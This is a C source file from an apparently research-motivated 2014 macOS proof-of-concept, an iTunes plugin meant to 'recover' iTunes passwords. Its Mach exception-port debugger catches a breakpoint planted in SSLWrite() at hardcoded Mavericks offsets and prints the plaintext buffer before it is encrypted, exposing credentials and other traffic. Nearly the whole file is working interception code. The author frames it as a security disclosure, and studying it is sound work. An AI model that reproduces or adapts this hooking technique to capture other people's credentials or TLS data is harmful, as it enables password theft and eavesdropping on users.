/*
 *
 *    _____                .__           ________                               __      ________.__
 *   /  _  \ ______ ______ |  |   ____   \______ \   ____   ____   ______ _____/  |_   /  _____/|__|__  __ ____
 *  /  /_\  \\____ \\____ \|  | _/ __ \   |    |  \ /  _ \_/ __ \ /  ___//    \   __\ /   \  ___|  \  \/ // __ \
 * /    |    \  |_> >  |_> >  |_\  ___/   |    `   (  <_> )  ___/ \___ \|   |  \  |   \    \_\  \  |\   /\  ___/
 * \____|__  /   __/|   __/|____/\___  > /_______  /\____/ \___  >____  >___|  /__|    \______  /__| \_/  \___  >
 *         \/|__|   |__|             \/          \/            \/     \/     \/               \/              \/
 *    _____    ___________             __        _____ ___.                  __
 *   /  _  \   \_   _____/_ __   ____ |  | __   /  _  \\_ |__   ____  __ ___/  |_
 *  /  /_\  \   |    __)|  |  \_/ ___\|  |/ /  /  /_\  \| __ \ /  _ \|  |  \   __\
 * /    |    \  |     \ |  |  /\  \___|    <  /    |    \ \_\ (  <_> )  |  /|  |
 * \____|__  /  \___  / |____/  \___  >__|_ \ \____|__  /___  /\____/|____/ |__|
 *         \/       \/              \/     \/         \/    \/
 *   _________                          .__  __          ._.
 *  /   _____/ ____   ____  __ _________|__|/  |_ ___.__.| |
 *  \_____  \_/ __ \_/ ___\|  |  \_  __ \  \   __<   |  || |
 *  /        \  ___/\  \___|  |  /|  | \/  ||  |  \___  | \|
 * /_______  /\___  >\___  >____/ |__|  |__||__|  / ____| __
 *         \/     \/     \/                       \/      \/
 *
 * AppleDoesntGiveAFuckAboutSecurity - An iTunes plugin to "recover" iTunes passwords
 *
 * Copyright (c) fG!, 2014 - reverser@put.as - http://reverse.put.as
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 * notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 * notice, this list of conditions and the following disclaimer in the
 * documentation and/or other materials provided with the distribution.
 * 3. The name of the author may not be used to endorse or promote products
 * derived from this software without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
 * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
 * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
 * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
 * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
 * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
 * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
 * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
 * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 *
 * debugger.c
 *
 */

#include "debugger.h"

#include <stdlib.h>
#include <sys/types.h>
#include <stdio.h>
#include <mach/mach.h>
#include <mach/mach_traps.h>
#include <string.h>
#include <mach/thread_status.h>
#include <unistd.h>
#include <setjmp.h>
#include <pthread.h>

/* exception message we will receive from the kernel */
typedef struct exc_msg {
    mach_msg_header_t Head;
    /* start of the kernel processed data */
    mach_msg_body_t msgh_body;
    mach_msg_port_descriptor_t thread;
    mach_msg_port_descriptor_t task;
    /* end of the kernel processed data */
    NDR_record_t NDR;
    exception_type_t exception;
    mach_msg_type_number_t codeCnt;
    int64_t code[2];
    int flavor;
    mach_msg_type_number_t old_stateCnt;
    natural_t old_state[224];
} exc_msg_t;

/* reply message we will send to the kernel */
typedef struct rep_msg {
    mach_msg_header_t Head;
    NDR_record_t NDR;
    kern_return_t RetCode;
    int flavor;
    mach_msg_type_number_t new_stateCnt;
    natural_t new_state[224];
} reply_msg_t;

extern "C" boolean_t mach_exc_server(mach_msg_header_t *request,mach_msg_header_t *reply);

/* global variables */
static mach_port_t task;           /* our own task port */
static mach_port_t exception_port; /* the exception port we will listen at */

/* local functions */
static void debug_loop(void);

#pragma mark Start the fun!

int
install_debugger(void)
{
    printf("Installing debugger thread...\n");
    kern_return_t kr = 0;
    task = mach_task_self();
    /* we only care about INT3 breakpoint exceptions */
    exception_mask_t exception_mask = EXC_MASK_BREAKPOINT;
    if ( (kr = mach_port_allocate(task, MACH_PORT_RIGHT_RECEIVE, &exception_port)) )
    {
        printf("Can't allocate mach port: %s (%d).\n", mach_error_string(kr), kr);
        exit(1);
    }
	if ( (kr = mach_port_insert_right(task, exception_port, exception_port, MACH_MSG_TYPE_MAKE_SEND)) )
    {
        printf("Can't insert port right: %s (%d).\n", mach_error_string(kr), kr);
        exit(1);
    }
	kr = task_set_exception_ports(task,
                                  exception_mask,
                                  exception_port,
                                  EXCEPTION_STATE_IDENTITY | MACH_EXCEPTION_CODES,
                                  MACHINE_THREAD_STATE);
    if (kr)
    {
        printf("Can't set exception ports: %s (%d).\n", mach_error_string(kr), kr);
        exit(1);
    }
    /* create the crash debugger thread and start it */
    pthread_t exception_thread;
    if ((pthread_create(&exception_thread, (pthread_attr_t*)0, (void *(*)(void *))debug_loop, (void*)0)))
    {
        printf("Can't create crash debugger thread.\n");
        exit(1);
    }
    pthread_detach(exception_thread);
    return KERN_SUCCESS;
}

#pragma mark The mach postman, sending and receiving messages!

/*
 * the debug loop in a new thread that will be responsible for receiving and
 * delivering the mach messages
 * mach_exc_server does the delivery magic
 */
static void
debug_loop(void)
{
    printf("Starting debug loop...\n");
    kern_return_t kr = 0;
    exc_msg_t   msg_recv;
    reply_msg_t msg_resp;
    while (1)
    {
        msg_recv.Head.msgh_local_port = exception_port;
        msg_recv.Head.msgh_size = sizeof(msg_recv);
        
        kr = mach_msg(&(msg_recv.Head),				// message
                      MACH_RCV_MSG|MACH_RCV_LARGE,	// options -> timeout MACH_RCV_TIMEOUT
                      0,							// send size (irrelevant here)
                      sizeof(msg_recv),				// receive limit
                      exception_port,				// port for receiving
                      0,							// no timeout
                      MACH_PORT_NULL);				// notify port (irrelevant here)
        
        if (kr == MACH_RCV_TIMED_OUT)
        {
            printf("Receive message timeout: %s (%d).\n", mach_error_string(kr), kr);
            continue;
        }
        else if (kr != MACH_MSG_SUCCESS)
        {
            printf("Got bad Mach message on receive: %s (%d).\n", mach_error_string(kr), kr);
            continue;
        }
        /* dispatch the message */
        mach_exc_server(&msg_recv.Head, &msg_resp.Head);
        /* receive reply */
        kr = mach_msg(&(msg_resp.Head),			// message
                      MACH_SEND_MSG,			// options -> timeout MACH_SEND_TIMEOUT
                      msg_resp.Head.msgh_size,	// send size
                      0,						// receive limit (irrelevant here)
                      MACH_PORT_NULL,			// port for receiving (none)
                      0,						// no timeout
                      MACH_PORT_NULL);			// notify port (we don't want one)
        
        if (kr == MACH_SEND_TIMED_OUT)
        {
            printf("Send message timeout: %s (%d).\n", mach_error_string(kr), kr);
            continue;
        }
        else if (kr != MACH_MSG_SUCCESS)
        {
            printf("Got bad Mach message on response: %s (%d).\n", mach_error_string(kr), kr);
            continue;
        }
    }
}

#pragma mark The exception handlers

extern "C" kern_return_t
catch_mach_exception_raise(mach_port_t exception_port, mach_port_t thread, mach_port_t task, exception_type_t exception, exception_data_t code, mach_msg_type_number_t codeCnt)
{
    return KERN_FAILURE;
}

extern "C" kern_return_t
catch_mach_exception_raise_state(mach_port_t exception_port, exception_type_t exception, const exception_data_t code, mach_msg_type_number_t codeCnt, int *flavor, const thread_state_t old_state, mach_msg_type_number_t old_stateCnt, thread_state_t new_state, mach_msg_type_number_t *new_stateCnt)
{
	return KERN_FAILURE;
}

/* the active handler, defined when we call task_set_exception_ports() */
extern "C" kern_return_t
catch_mach_exception_raise_state_identity (mach_port_t exception_port,
                                           mach_port_t thread,
                                           mach_port_t task,
										   exception_type_t exception,
                                           exception_data_t code,
                                           mach_msg_type_number_t codeCnt,
										   int *flavor,
                                           thread_state_t old_state,
                                           mach_msg_type_number_t old_stateCnt,
										   thread_state_t new_state,
                                           mach_msg_type_number_t *new_stateCnt)
{
    /* we set to receive only BREAKPOINT exceptions but verify it anyway */
    if (exception == EXC_BREAKPOINT)
    {
        if (*flavor == x86_THREAD_STATE)
        {
            x86_thread_state_t *x86_thread = (x86_thread_state_t*)old_state;
            x86_thread_state64_t *state = (x86_thread_state64_t*)&x86_thread->uts.ts64;
            /* well, this is a very lazy PoC so stuff is hardcoded and implemented the shortest way */
            /* if this was a well done thing it would use either hardware breakpoints or
             * restore original byte, disassemble instruction, breakpoint on next instruction and restore the breakpoint
             * since it's a PoC you get hardcoded offsets and lazy tricks!
             */
            
            /* Disassembly for SSLWrite() in Mavericks 10.9.1
             0x7fff928d3d37 (0x52d37):  55                            push   rbp   	[Security]
             0x7fff928d3d38 (0x52d38):  48 89 e5                      mov    rbp,rsp   	[Security]
             0x7fff928d3d3b (0x52d3b):  41 57                         push   r15   	[Security]
             */
            /* emulate instruction MOV RBP, RSP 
             * this way we don't need to restore original byte
             */
            state->__rbp = state->__rsp;
            /* advance RIP to the next instruction */
            /* don't forget INT3 is one byte ahead in RIP so we just need to advance 2 bytes here */
            state->__rip += 2;
            /* OSStatus
               SSLWrite(SSLContext *ctx, const void *data, UInt32 dataLength, UInt32 *bytesWritten)
             * We want to take a peak at data so that is RSI register contents
             * Cast it to a char and dump it (we really should allocate a buffer, copy it and NULL terminate
             * Lazy PoC, right? :P
             * NOTE: we are in the same process space so we don't even need to use mach_vm_read functions to retrieve memory!
             */
            char *buffer = (char*)state->__rsi;
            printf("Message contents:\n%s\n", buffer);
            /* we need to update new_state with our changes to RIP and RBP and return SUCCESS in handling the exception */
            memcpy(new_state, old_state, x86_THREAD_STATE_COUNT * sizeof(natural_t));
            *new_stateCnt = x86_THREAD_STATE_COUNT;
            return KERN_SUCCESS;
        }
    }
    return KERN_SUCCESS;
}
